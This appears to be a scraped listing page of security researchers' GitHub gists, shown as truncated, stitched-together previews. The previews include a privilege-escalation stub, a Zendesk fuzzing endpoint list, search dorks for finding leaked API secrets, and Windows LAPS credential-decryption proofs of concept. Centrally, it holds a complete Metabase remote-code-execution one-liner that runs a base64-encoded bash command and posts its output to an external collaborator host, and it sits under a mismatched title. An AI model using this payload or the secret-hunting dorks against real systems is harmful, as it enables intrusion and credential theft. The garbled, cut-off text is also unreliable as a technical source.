user@hostname:~/exploit$ cat > test.c#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
if (setuid(0) != 0) {
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Security.Cryptography; | |
| using System.Runtime.Serialization.Formatters.Binary; | |
| namespace hawktracewsus | |
| { | |
| class Program | |
| { | |
| static void Main() |
ott3rly
/ nmap-xml-to-httpx.sh
Created
February 20, 2024 09:50
Convert nmap xml output suitable for httpx
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Check if an argument was provided | |
| if [ $# -eq 0 ]; then | |
| NMAP_XML_OUTPUT="/dev/stdin" | |
| else | |
| NMAP_XML_OUTPUT="$1" | |
| fi | |
| # Use xmllint to parse IP addresses and ports from the Nmap XML output |
win3zz
/ GameOver(lay).md
Last active
January 3, 2025 05:42
Privilege escalation vulnerabilities in Ubuntu/Kali Linux (CVE-2023-2640 and CVE-2023-32629)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| TARGET="http://127.0.0.1:3000"; \ | |
| COLLABORATOR="http://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oastify.com/"; \ | |
| COMMAND="uname -a"; \ | |
| ENCODED_COMMAND=$(echo -n "curl -X POST -d \"\$(${COMMAND})\" ${COLLABORATOR}" | base64 | tr -d '\n' | sed 's/=/%3D/g'); \ | |
| SETUP_TOKEN=$(curl -s "${TARGET}/api/session/properties" | jq -r '.["setup-token"]'); \ | |
| PAYLOAD='{"token":"'${SETUP_TOKEN}'","details":{"details":{"db":"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER test BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('\''bash -c {echo,'${ENCODED_COMMAND}'}|{base64,-d}|{bash,-i}'\'')\n$$--=x","advanced-options": false},"engine":"h2"}}'; \ | |
| curl -X POST -H "Content-Type: application/json" -d "${PAYLOAD}" "${TARGET}/api/setup/validate" |
win3zz
/ zendesk_endpoints.txt
Created
July 18, 2023 09:01
List of Zendesk API Endpoints for Fuzzing [Penetration Testing]
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /api/v2/accounts | |
| GET /api/v2/activities?since=cstest | |
| GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&filter[actor_id]=1&filter[ip_address]=cstest&filter[created_at]=cstest&filter[action]=cstest&sort_by=cstest&sort_order=cstest&sort=cstest | |
| GET /api/v2/automations | |
| POST /api/v2/automations | |
| GET /api/v2/bookmarks | |
| POST /api/v2/bookmarks | |
| GET /api/v2/brands | |
| POST /api/v2/brands | |
| GET /api/v2/custom_objects |
- 14 solves / 333 pts
- CTFtime: https://ctftime.org/event/1929
- Official repository: https://github.com/google/google-ctf/tree/master/2023/web-biohazard 1
Footnotes
-
I predict that this URL will be broken because the directory structure will change when the final round source code is released, as in previous years 😅 ↩
win3zz
/ GitHub-Leaked-API-Keys-and-Secrets.md
Last active
October 26, 2025 02:39
As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.
(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))
**1.
xpn
/ AADLAPS_Request.txt
Last active
January 30, 2024 10:34
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GET /beta/deviceLocalCredentials/[DEVICE-ID]?$select=credentials HTTP/1.1 | |
| ocp-client-version: 1.0 | |
| client-request-id: 96cbfa59-dbfc-4a92-b261-7f77bd8f4b9b | |
| ocp-client-name: Get-LapsAADPassword Windows LAPS Cmdlet | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Microsoft Windows 10.0.22621; en-US) PowerShell/5.1.22621.963 Invoke-MgGraphRequest | |
| SdkVersion: graph-powershell/1.26.0, Graph-dotnet-1.25.1 | |
| FeatureFlag: 00000047 | |
| Cache-Control: no-store, no-cache | |
| Authorization: Bearer [AAD-JWT-HERE] | |
| Accept-Encoding: gzip |
xpn
/ LAPSDecrypt.cs
Last active
October 21, 2025 14:17
Quick POC looking at how encryption works for LAPS (v2)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.DirectoryServices.Protocols; | |
| using System.Globalization; | |
| using System.Linq; | |
| using System.Runtime.InteropServices; | |
| using System.Runtime.InteropServices.ComTypes; | |
| using System.Security.Policy; | |
| using System.Security.Principal; | |
| using System.Text; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Runtime.CompilerServices; | |
| using System.Net; | |
| using System.Reflection; | |
| using System.Runtime.InteropServices; | |
| namespace Test | |
| { | |
| // CCOB IS THE GOAT |
NewerOlder